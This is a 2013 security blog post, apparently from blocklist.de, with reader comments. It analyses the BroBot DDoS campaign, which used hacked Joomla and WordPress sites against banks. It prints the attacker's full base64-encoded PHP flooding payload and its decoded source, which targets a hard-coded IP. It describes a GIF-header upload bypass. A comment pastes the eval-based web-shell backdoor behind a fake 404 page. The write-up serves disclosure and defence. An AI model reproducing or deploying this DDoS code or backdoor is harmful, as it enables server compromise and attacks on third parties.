-google-ads-
2013
01.26

We seen the first ddos against ns1.google.com and bank of america on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The Hacker abused old installations of „bluestork“-Templates and old WordPress-Sites.

And he upload the complete Script and calls him over get-Parameters to start it.

Then he changed it to upload only html-Forms over old Joomlas < 2.5.7 (most the JCE-Editor was hacked) and use the gif-Failure in php and Skript (the upload-Script has in the first lines a Gif-Header and binary code.

The „file“ Program and Linux says it is an gif-image, but he has after them normal php-code.

Over the Upload-Script, he uploads a small other Script and sends the Data over POST with base64_decode() the complete Data from one of the Post-Data from $_REQUEST[‚mjdu‘] was:


eval(base64" - replace it with _"decode("DQokaWlpPScxNzEuMTYxLjE5OS4xMDAnOw0KJHBwcD0nNDQzJzsNCiRkZGQ9JzM2MDAnOw0KJHNzdHQ9JzMwJzsNCiRycnR0PSc1JzsNCiRwcHNzPSczJzsNCmlmKGZpbGVfZXhpc3RzKCJzdGV4dC50eHQiKS
kNCnsNCgkkZmZwPWZvcGVuKCJzdGV4dC50eHQiLCJyIik7DQoJJHJyPWZyZWFkKCRmZnAsOCk7DQoJZmNsb3NlKCRmZnApOw0KCWlmKCRycj09Ik5vVHRFeFRyVW4iKQ0KCXsNCgkJJGZmcDI9Zm9wZW4oInN0ZXh0LnR4dCIsIncrIik7D
QoJCWZjbG9zZSgkZmZwMik7DQoJCXVubGluaygic3RleHQudHh0Iik7DQoJCWV4aXQoKTsNCgkJZGllKCk7DQoJfQ0KCXVubGluaygic3RleHQudHh0Iik7DQp9DQoNCiRzdGVwX3RpbWU9dGltZSgpKyRzc3R0Ow0KJHJlbGVhc2VfdGlt
ZT10aW1lKCkrJHJydHQ7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFsndGltZV9lJ10pKQ0Kew0KCSRtYXhfdGltZSA9ICRfUkVRVUVTVFsndGltZV9lJ107DQp9DQplbHNlDQp7DQoJJHRpbWUgPSB0aW1lKCk7DQoJJG1heF90aW1lID0gJHR
pbWUrJGRkZDsNCn0NCgkkb3V0PXN0cl9yZXBlYXQoIi4iLCAkcHBzcyk7DQokZmlyc3QxPTA7DQp3aGlsZSh0aW1lKCkgPCAkbWF4X3RpbWUpDQp7CQ0KCWlmKHRpbWUoKSA+ICRyZWxlYXNlX3RpbWUgJiYgJGZpcnN0MT09MCkNCgl7DQ
oJCSRmaXJzdDE9MTsNCgkJJGFkZHJlc3NfaG9zdD0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiIvIi4kX1NFUlZFUlsnUEhQX1NFTEYnXTsNCgkJJGRhdGExWydtamR1J109JF9SRVFVRVNUWydtamR1J107DQoJCSRkYXRhM
VsncHNidCddPSRfUkVRVUVTVFsncHNidCddOw0KCQkkZGF0YTFbJ3RpbWVfZSddPSRtYXhfdGltZTsNCgkJJGNoMSA9QGN1cmxfaW5pdCgpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfVVJMLCRhZGRyZXNzX2hvc3QpOw0KCQlj
dXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsRkFMU0UpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsMik7DQoJCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9IRUFERVIsMSk7DQo
JCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwwKTsNCgkJY3VybF9zZXRvcHQoJGNoMSxDVVJMT1BUX1RJTUVPVVQsMTApOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfUE9TVCwgdHJ1ZSk7DQoJCWN1cmx
fc2V0b3B0KCRjaDEsQ1VSTE9QVF9QT1NURklFTERTLCAkZGF0YTEpOw0KCQljdXJsX2V4ZWMoJGNoMSk7DQoJCWN1cmxfY2xvc2UoJGNoMSk7DQoJfQ0KCWlmKHRpbWUoKSA+ICRzdGVwX3RpbWUpDQoJew0KCQlAZXhpdCgpOw0KCQlAZGl
lKCk7DQoJfQ0KCSRzb2NrZXQgPSBAc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovLyRpaWk6JHBwcCIsJGVyciwkZXJyMiwxLFNUUkVBTV9DTElFTlRfQVNZTkNfQ09OTkVDVCk7DQoJCWlmICgkc29ja2V0KSANCgkJew0KCQkJQHN0cmV
hbV9zZXRfd3JpdGVfYnVmZmVyKCRzb2NrZXQsIDApOw0KCQkJQHN0cmVhbV9zb2NrZXRfc2VuZHRvKCRzb2NrZXQsJG91dCk7DQoJCX0NCglAZmNsb3NlKCRzb2NrZXQpOzsNCn0NCiRmZnAyPWZvcGVuKCJzdGV4dC50eHQiLCJ3KyIpO2Z
jbG9zZSgkZmZwMik7dW5saW5rKCJzdGV4dC50eHQiKTs="));

 

encoded it was:


$iii='171.161.199.100';
$ppp='443';
$ddd='3600';
$sstt='30';
$rrtt='5';
$ppss='3';
if(file_exists("stext.txt"))
{
$ffp=fopen("stext.txt","r");
$rr=fread($ffp,8);
fclose($ffp);
if($rr=="NoTtExTrUn")
{
$ffp2=fopen("stext.txt","w+");
fclose($ffp2);
unlink("stext.txt");
exit();
die();
}
unlink("stext.txt");
}
$step_time=time()+$sstt;
$release_time=time()+$rrtt;
 
if(isset($_REQUEST['time_e']))
{
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$ddd;
}
$out=str_repeat(".", $ppss);
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$data1['mjdu']=$_REQUEST['mjdu'];
$data1['psbt']=$_REQUEST['psbt'];
$data1['time_e']=$max_time;
$ch1 =@curl_init();
curl_setopt($ch1,CURLOPT_URL,$address_host);
curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch1,CURLOPT_HEADER,1);
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,10);
curl_setopt($ch1,CURLOPT_POST, true);
curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
curl_exec($ch1);
curl_close($ch1);
}
if(time() > $step_time)
{
@exit();
@die();
}
$socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_set_write_buffer($socket, 0);
@stream_socket_sendto($socket,$out);
}
@fclose($socket);;
}
$ffp2=fopen("stext.txt","w+");fclose($ffp2);unlink("stext.txt");

Why he use:
@exit();
and
@die();
one of them are enough 😉 die() is the same like exit() ->
function die on php.net

brobot-ddos-01-2013

 

There was better code after the first script, in which he has curl-functions again and again. For this code you usually uses functionals to deduce double code 🙂

on the 22.01.2013 we found over 250 abused Joomla-Installations.

Today (25.01.2013) he hacks Joomla Installations with a Version under 2.5.8 and WordPress with older Plugins like akisment version 2.5.5.

Is is necessary to update your Installations very fast or your Server attacks us-financial institutions 🙂

Think about over 250 hacked sites on Servers from only one hoster to create a ddos, you have a lot of power and bandwidth and we think in the world, there a very large numbers of old Joomla-Installations on Servers 🙂

-google-ads-
  1. Just got an warning from my host, this is possibly related.
    found this in a Joomla Installation with an hacked „Articles Anywhere“ plugin from „noNumber“.

    Relevant lines:

    <?php
    @set_time_limit(0);
    @error_reporting(NULL);
    @ini_set('display_errors',0);
    @ignore_user_abort(TRUE);

    if(md5(md5($_REQUEST['psbt']))=='ad54fb8768fdc2ff87dd9f0683d3f278' and $_REQUEST['mjdu']!=NULL)
    {
    $_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
    $_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
    eval($_REQUEST['mjdu']);
    die();
    exit();
    }
    else
    {
    echo '404 Not FoundNot FoundThe requested URL ‚.$_SERVER[‚PHP_SELF‘].‘ was not found on this server Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request‘;die();exit();
    }
    ?>

  2. Update, current Wave of BroBot-Runner: http://blog.blocklist.de/2013/03/22/current-brobot-wave-runners-ips-hacked-sites/

    @Join-D
    Thanks! Yes, this was the last Code of the PHP-Files which used the BroBot to uploading the Malware-Files which execute the ddos-Code (Post-Request with base64_decode…).

  3. […] Update from the brobot (ddos against financial institution, like bank of america) […]

Translate »